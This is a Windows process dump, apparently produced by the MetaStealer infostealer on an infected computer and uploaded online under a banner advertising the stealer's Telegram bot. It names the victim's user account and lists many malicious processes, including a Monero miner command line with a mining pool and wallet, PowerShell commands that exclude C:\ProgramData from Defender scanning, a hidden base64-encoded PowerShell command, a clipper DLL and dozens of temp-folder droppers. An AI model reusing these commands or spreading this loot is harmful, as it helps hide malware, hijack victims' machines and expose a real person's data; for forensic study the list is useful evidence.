Process List

The document lists process information from a Windows system, including the process ID, name, and command line. It shows many instances of a process called oneetx.exe running from a temp folder, which is suspicious. The document provides forensic details that could help analyze the system's state.

Uploaded by blackcaliber44

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 608, Name: csrss.exe, CommandLine:
===============
ID: 696, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 860, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1856, Name: NVDisplay.Container.exe, CommandLine: "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -f "C:\ProgramData\NVIDIA\DisplaySessionContainer%d.log" -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\Session" -r -l 3 -p 30000 -c
===============
ID: 4328, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 4376, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
===============
ID: 4404, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
===============
ID: 4520, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
===============
ID: 4776, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 4964, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 596, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 5256, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 5552, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -Embedding
===============
ID: 5632, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 1212, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 4972, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 6376, Name: SkypeApp.exe, CommandLine:
===============
ID: 7104, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 2960, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\SecurityHealthSystray.exe"
===============
ID: 6708, Name: RAVCpl64.exe, CommandLine: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
===============
ID: 1816, Name: OneDrive.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
===============
ID: 7412, Name: IDMan.exe, CommandLine: "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot
===============
ID: 8004, Name: IEMonitor.exe, CommandLine: "C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe"
===============
ID: 8636, Name: explorer.exe, CommandLine: "C:\Windows\explorer.exe"
===============
ID: 6128, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 9732, Name: explorer.exe, CommandLine: "C:\Windows\Resources\Themes\explorer.exe"
===============
ID: 10216, Name: svchost.exe, CommandLine: c:\windows\resources\svchost.exe
===============
ID: 8504, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 7960, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup
===============
ID: 1464, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 7656, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 2752, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:ShellFeedsUI.AppX88fpyyrd21w8wqe62wzsjh5agex7tf1e.mca
===============
ID: 9364, Name: LocationNotificationWindows.exe, CommandLine: C:\Windows\System32\LocationNotificationWindows.exe
===============
ID: 8344, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\ApplicationFrameHost.exe -Embedding
===============
ID: 3944, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 9536, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 9576, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 9744, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 3972, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 3856, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 2372, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 7764, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 9396, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 5528, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 2232, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 6580, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 5272, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 176, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 9040, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 3044, Name: FileCoAuth.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileCoAuth.exe" -Embedding
===============
ID: 2640, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 9724, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 5572, Name: rundll32.exe, CommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\dinoj\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
===============
ID: 6628, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 4960, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 9108, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 7088, Name: oneetx.exe, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
===============
ID: 7992, Name: TFT_MTK_v5.exe, CommandLine: "C:\TFT_MTKv5\TFT_MTK_v5.exe"
===============
ID: 5816, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 5180, Name: mmc.exe, CommandLine: "C:\Windows\system32\mmc.exe" C:\Windows\system32\devmgmt.msc
===============
ID: 10728, Name: Taskmgr.exe, CommandLine: "C:\Windows\system32\taskmgr.exe" /4
===============
ID: 6844, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 12616, Name: MRoem7RdEoVAYYcFEydbq05F.exe, CommandLine: "C:\Users\dinoj\OneDrive\Pictures\Minor Policy\MRoem7RdEoVAYYcFEydbq05F.exe"
===============
ID: 12624, Name: ttVNLlmfgxU3M5Gbxntovzxf.exe, CommandLine: "C:\Users\dinoj\OneDrive\Pictures\Minor Policy\ttVNLlmfgxU3M5Gbxntovzxf.exe"
===============
ID: 12728, Name: is-M92E7.tmp, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\is-EIOBV.tmp\is-M92E7.tmp" /SL4 $1807E4 "C:\Users\dinoj\OneDrive\Pictures\Minor Policy\ttVNLlmfgxU3M5Gbxntovzxf.exe" 2562274 56320
===============
ID: 12928, Name: Rec419.exe, CommandLine: "C:\Program Files (x86)\FKDsoftFR\Rec419\Rec419.exe"
===============
ID: 12640, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
===============
ID: 14232, Name: java.exe, CommandLine: C:\Users\dinoj\AppData\Roaming\Java\jre8\bin\java.exe --expose-gc C:\Users\dinoj\AppData\Roaming\Java\jre8\bin\java.exe:jnl
===============
ID: 12084, Name: 73rO5RQ0h.exe, CommandLine: C:\Users\dinoj\AppData\Local\6e4dc66a-114f-4d4e-b649-04159caf878c\73rO5RQ0h.exe --Task
===============
ID: 17040, Name: 9sxrTGw3nEjlZqapNtw3DcJr.exe, CommandLine: "C:\Users\dinoj\OneDrive\Pictures\Minor Policy\9sxrTGw3nEjlZqapNtw3DcJr.exe"
===============
ID: 16520, Name: is-7TBUR.tmp, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\is-8070R.tmp\is-7TBUR.tmp" /SL4 $1004E8 "C:\Users\dinoj\OneDrive\Pictures\Minor Policy\9sxrTGw3nEjlZqapNtw3DcJr.exe" 2685655 56320
===============
ID: 13196, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
===============
ID: 7328, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\dinoj\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\dinoj\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\dinoj\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=112.0.5615.138 --initial-client-data=0x1a4,0x1a8,0x1ac,0x180,0x1b0,0x7fff85569a60,0x7fff85569a70,0x7fff85569a80
===============
ID: 11796, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:2
===============
ID: 4296, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:8
===============
ID: 15672, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2676 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:8
===============
ID: 16620, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --time-ticks-at-unix-epoch=-1681920336100689 --launch-time-ticks=7605955812 --mojo-platform-channel-handle=3456 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 17940, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1681920336100689 --launch-time-ticks=7609496029 --mojo-platform-channel-handle=3684 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 14224, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --time-ticks-at-unix-epoch=-1681920336100689 --launch-time-ticks=7609829133 --mojo-platform-channel-handle=3836 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 12304, Name: oneetx.exe, CommandLine: C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe
===============
ID: 12180, Name: oneetx.exe, CommandLine: C:\Users\dinoj\AppData\Local\Temp\cb7ae701b3\oneetx.exe
===============
ID: 17732, Name: WerFault.exe, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 12304 -s 340
===============
ID: 1788, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --time-ticks-at-unix-epoch=-1681920336100689 --launch-time-ticks=7692015251 --mojo-platform-channel-handle=5172 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 13096, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --time-ticks-at-unix-epoch=-1681920336100689 --launch-time-ticks=7813928552 --mojo-platform-channel-handle=4940 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:1
===============
ID: 17928, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --mojo-platform-channel-handle=4800 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:8
===============
ID: 12352, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 20960, Name: backgroundTaskHost.exe, CommandLine: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
===============
ID: 21124, Name: powershell.exe, CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 21252, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20664, Name: tasklist.exe, CommandLine: tasklist /fo csv /nh
===============
ID: 16092, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 21324, Name: WBGRGV.exe, CommandLine: C:\ProgramData\portableWin\WBGRGV.exe
===============
ID: 21724, Name: 73rO5RQ0h.exe, CommandLine: C:\Users\dinoj\AppData\Local\6e4dc66a-114f-4d4e-b649-04159caf878c\73rO5RQ0h.exe --Task
===============
ID: 21896, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --mojo-platform-channel-handle=5140 --field-trial-handle=2064,i,15266049202769413495,5875009222765056025,131072 /prefetch:8
===============
ID: 22444, Name: nbPC_K7zYSDlnZUbZ0DImshi.exe, CommandLine: "C:\Users\dinoj\OneDrive\Pictures\Minor Policy\nbPC_K7zYSDlnZUbZ0DImshi.exe"
===============
ID: 22512, Name: _0YVIOahAGtszsZAFB8IPFXO.exe, CommandLine: "C:\Users\dinoj\OneDrive\Pictures\Minor Policy\_0YVIOahAGtszsZAFB8IPFXO.exe"
===============
ID: 21520, Name: KrzfXiRgtb_0uSauuqlTvCB3.exe, CommandLine: "C:\Users\dinoj\OneDrive\Pictures\Minor Policy\KrzfXiRgtb_0uSauuqlTvCB3.exe"
===============
ID: 18828, Name: is-B4CNR.tmp, CommandLine: "C:\Users\dinoj\AppData\Local\Temp\is-FAUAE.tmp\is-B4CNR.tmp" /SL4 $43081E "C:\Users\dinoj\OneDrive\Pictures\Minor Policy\nbPC_K7zYSDlnZUbZ0DImshi.exe" 2562561 56320
===============
ID: 5328, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 20740, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 21648, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 22204, Name: eggcetr, CommandLine: C:\Users\dinoj\AppData\Roaming\eggcetr
===============
ID: 1388, Name: powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 19448, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1932006262
===============
ID: 21260, Name: powershell.exe, CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 22024, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4